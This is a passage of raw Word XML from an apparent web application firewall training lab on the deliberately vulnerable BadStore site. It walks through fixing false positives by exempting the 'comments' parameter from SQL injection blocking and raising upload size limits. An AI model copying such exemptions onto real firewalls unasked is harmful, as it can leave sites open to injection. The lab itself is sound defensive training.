                    <a:blip r:embed="R0333646600ca45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28825" cy="1202989"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="7F2DB38D" w14:textId="4A794989">
      <w:r>
        <w:t>Can you figure out why and fix it?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="2A06F585" w14:textId="78A005F4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="2E116BF6" w14:textId="4F423895">
      <w:r>
        <w:t>Try it yourself and look at the Firewall Log to see why the request was blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C24694F" w:rsidP="699639B3" w:rsidRDefault="3F6CA8C4" w14:paraId="370FCAF3" w14:textId="6FDF5F7F">
      <w:r w:rsidR="3F6CA8C4">
        <w:drawing>
          <wp:inline wp14:editId="2CB9F258" wp14:anchorId="5666C10B">
            <wp:extent cx="4029076" cy="1710888"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="546672717" name="Picture 546672717" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 546672717"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R35f83a5b0a744d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29076" cy="1710888"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="2CC59FD6" w14:textId="514F5F15">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="6CFF7C79" w14:textId="310EA824">
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t>It looks like we need to stop SQL Injection patterns from being blocked here</w:t>
      </w:r>
      <w:r w:rsidR="428D8395">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve">But obviously, we </w:t>
      </w:r>
      <w:r w:rsidR="00EDBF3A">
        <w:rPr/>
        <w:t>do not</w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve"> want to turn SQL Injection protection off for the </w:t>
      </w:r>
      <w:r w:rsidR="3337FCC0">
        <w:rPr/>
        <w:t>entire site</w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve">. Which </w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t>component</w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve"> could help us?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="6DE7946C" w14:textId="51A8332A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="4E69B8F8" w14:textId="7774E8C7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="5B1322E3" w14:textId="19984F89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Add the App Profiles component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="00163BC3" w14:paraId="338D65E6" w14:textId="48E98541">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve">Click Add </w:t>
      </w:r>
      <w:r w:rsidR="653A5B93">
        <w:rPr/>
        <w:t>URL and</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve"> add the URL from the </w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>firewall</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve"> log: “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>badstore.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="699639B3" w:rsidRDefault="00163BC3" w14:paraId="0330051A" w14:textId="2D5DB61B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>You can leave all the settings at their defaults.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="00163BC3" w14:paraId="597BD3DA" w14:textId="16C4EB66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hover over the “badstore.cgi” profile, and click the “Add Parameter” icon (looks like a plus with</w:t>
      </w:r>
      <w:r w:rsidR="6A9851C5">
        <w:t xml:space="preserve"> a gear)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="38DD7BB8" w14:paraId="0670459F" w14:textId="117F8DA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="16C9B2F1">
        <w:drawing>
          <wp:inline wp14:editId="20D07DD5" wp14:anchorId="0EEFCEBE">
            <wp:extent cx="3763516" cy="1787670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="347451931" name="Picture 347451931" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 347451931"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R872cedb9e56f4d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63516" cy="1787670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="003B48A4" w:rsidRDefault="00163BC3" w14:paraId="5233F290" w14:textId="31D01C7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter the parameter which was blocked in the firewall log for the parameter name: “comments”.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="38DD7BB8" w14:paraId="0C9146E0" w14:textId="23B329C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t>For Parameter Class, select Custom</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve">Check all the </w:t>
      </w:r>
      <w:r w:rsidR="7ACBD262">
        <w:rPr/>
        <w:t>boxes but</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve"> uncheck “Block SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="40AF8625">
        <w:drawing>
          <wp:inline wp14:editId="48DAA654" wp14:anchorId="77AA75F9">
            <wp:extent cx="3882524" cy="3345440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57603019" name="Picture 57603019" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 57603019"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R04422b027ca443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82524" cy="3345440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="38DD7BB8" w14:paraId="58A71415" w14:textId="4D2760D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="59C4101A" w:rsidR="03E60FA1">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidR="03E60FA1">
        <w:drawing>
          <wp:inline wp14:editId="63699221" wp14:anchorId="769C6543">
            <wp:extent cx="725714" cy="464457"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34588716" name="Picture 34588716" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 34588716"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R2db6164534374f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25714" cy="464457"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="26A942C8" w14:paraId="2C6F27E6" w14:textId="300369B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Test out the website – see if that fixed it</w:t>
      </w:r>
      <w:r w:rsidR="495B441B">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="00163BC3" w14:paraId="3763BFD8" w14:textId="4E0481B4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="00163BC3" w:rsidRDefault="00163BC3" w14:paraId="7B7B1AD3" w14:textId="35B02257">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>False Positive: Password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="36972E4B" w14:textId="3F7BD1E0"/>
    <w:p w:rsidR="00163BC3" w:rsidP="00163BC3" w:rsidRDefault="00163BC3" w14:paraId="3E177FD6" w14:textId="220BF1ED">
      <w:r>
        <w:t>The customer reports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="32F6121D" w:rsidRDefault="00163BC3" w14:paraId="26758409" w14:textId="55718946">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve">My longtime customer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>MeMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5AF7A432">
        <w:rPr/>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve"> log in to the site</w:t>
      </w:r>
      <w:r w:rsidR="4427880D">
        <w:rPr/>
        <w:t xml:space="preserve">! </w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>He says he is trying to go to the “Login/Register” section, entering his email me@me.com and his password, which is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="00163BC3" w:rsidRDefault="00163BC3" w14:paraId="3F4CCD1E" w14:textId="0557108F">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r>
        <w:t>Burg&lt;Fry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="00163BC3" w:rsidRDefault="00163BC3" w14:paraId="7822F5C5" w14:textId="2D758DE2">
      <w:r>
        <w:t>Can you figure out why MeMe is getting blocked?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="00163BC3" w:rsidRDefault="00163BC3" w14:paraId="11D0CF60" w14:textId="67A8545D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="00163BC3" w:rsidRDefault="00163BC3" w14:paraId="3FB95CC3" w14:textId="793E0128">
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidR="38DBBD16">
        <w:rPr/>
        <w:t xml:space="preserve">remarkably </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="38DBBD16">
        <w:rPr/>
        <w:t>similar</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve"> the guestbook false positive</w:t>
      </w:r>
      <w:r w:rsidR="25FF31D0">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0BF6A816">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>See if you can follow similar steps but with the right parameter and pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2D88C08A" w:rsidP="699639B3" w:rsidRDefault="0DF80279" w14:paraId="2AF60D85" w14:textId="1808C5AD">
      <w:r w:rsidR="0DF80279">
        <w:drawing>
          <wp:inline wp14:editId="567F1BE8" wp14:anchorId="0C622554">
            <wp:extent cx="4191000" cy="1168644"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1503043313" name="Picture 1503043313" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1503043313"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rd46dde86a56149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91000" cy="1168644"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="699639B3" w:rsidRDefault="699639B3" w14:paraId="5FFB1EF7" w14:textId="3DE92E0D"/>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="1473481C" w14:textId="108970B8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265211" w:rsidP="00265211" w:rsidRDefault="0005619E" w14:paraId="6AB7E6FF" w14:textId="6837AFC9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>False Positive</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:t>: File Uploads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="29A0B10F" w14:textId="00323FEE">
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>The customer reports:</w:t>
      </w:r>
      <w:r w:rsidR="52040ECA">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>One of my suppliers is having trouble uploading their price lists</w:t>
      </w:r>
      <w:r w:rsidR="7A2FB86E">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve">He is going to the “Supplier Login” section, entering his email </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>big@spender.com ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve"> his password “money</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>”,</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve"> and clicking Login</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="20B7B257">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="20B7B257">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="184C1F62">
        <w:rPr/>
        <w:t xml:space="preserve">Note: My supplier has made the price list for you to troubleshoot with available at: </w:t>
      </w:r>
      <w:hyperlink r:id="R0cf9c5f4913c4c84">
        <w:r w:rsidRPr="32F6121D" w:rsidR="184C1F62">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://s3.amazonaws.com/nmiron-sko20-labs/pricelist.dat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="184C1F62">
        <w:rPr/>
        <w:t xml:space="preserve"> .  You can save this </w:t>
      </w:r>
      <w:r w:rsidR="28EB0930">
        <w:rPr/>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="184C1F62">
        <w:rPr/>
        <w:t>to your computer</w:t>
      </w:r>
      <w:r w:rsidR="391B9172">
        <w:rPr/>
        <w:t xml:space="preserve"> now</w:t>
      </w:r>
      <w:r w:rsidR="391B9172">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="391B9172">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>Then he selects his price list, enters a filename of “my-pricelist.doc</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>”,</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve"> and clicks Upload. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="687CA52E" w:rsidP="699639B3" w:rsidRDefault="4B8AB2B2" w14:paraId="3FAD9296" w14:textId="3ECAEB00">
      <w:r w:rsidR="4B8AB2B2">
        <w:drawing>
          <wp:inline wp14:editId="2184C233" wp14:anchorId="392AB527">
            <wp:extent cx="2080171" cy="1801078"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1569228050" name="Picture 1569228050" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1569228050"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R8f9328f7e4eb47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80171" cy="1801078"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="4960FEF7">
        <w:drawing>
          <wp:inline wp14:editId="4CB5B0C0" wp14:anchorId="433D0333">
            <wp:extent cx="2867025" cy="1699999"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="623780379" name="Picture 623780379" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 623780379"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R3a08f8857fc04e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67025" cy="1699999"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F910CE0" w:rsidP="699639B3" w:rsidRDefault="5F910CE0" w14:paraId="1F0F6707" w14:textId="2B4D0132">
      <w:r w:rsidR="5F910CE0">
        <w:rPr/>
        <w:t>He gets blocked</w:t>
      </w:r>
      <w:r w:rsidR="3F531BD6">
        <w:rPr/>
        <w:t xml:space="preserve">! </w:t>
      </w:r>
      <w:r w:rsidR="5F910CE0">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="4BD4257A" w14:textId="0F37929F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="62008CD1" w14:textId="1B1740DD">
      <w:r>
        <w:t>What does the Firewall Log entry say when you try it?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="66201DBF" w14:textId="1926A914">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="7B312D51" w14:textId="6F3C1046">
      <w:r>
        <w:t>Files are uploaded through URL parameters. Which component would you expect to use to control parameter limits?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="6E493966" w14:textId="09F16140">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="778FF361" w14:paraId="0C2C79CB" w14:textId="1E9669BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="778FF361">
        <w:rPr/>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="00FF500C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Parameter Protection</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>component</w:t>
      </w:r>
      <w:r w:rsidR="27371931">
        <w:rPr/>
        <w:t xml:space="preserve"> you previously </w:t>
      </w:r>
      <w:r w:rsidR="0A9720DC">
        <w:rPr/>
        <w:t>added.</w:t>
      </w:r>
      <w:r w:rsidR="27371931">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="003D9E00" w14:textId="6FD3ECB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find the Max Upload File Size input and change it to 10240 (10MB).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00FF500C" w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="302D6800" w14:textId="66748993">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="27A2EE48" w:rsidP="699639B3" w:rsidRDefault="2CFD1F03" w14:paraId="3C65440D" w14:textId="1E1D7785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2CFD1F03">
        <w:rPr/>
        <w:t xml:space="preserve">Test again </w:t>
      </w:r>
      <w:r w:rsidR="44EEB6D4">
        <w:drawing>
          <wp:inline wp14:editId="1CCE03E4" wp14:anchorId="3673FD4D">
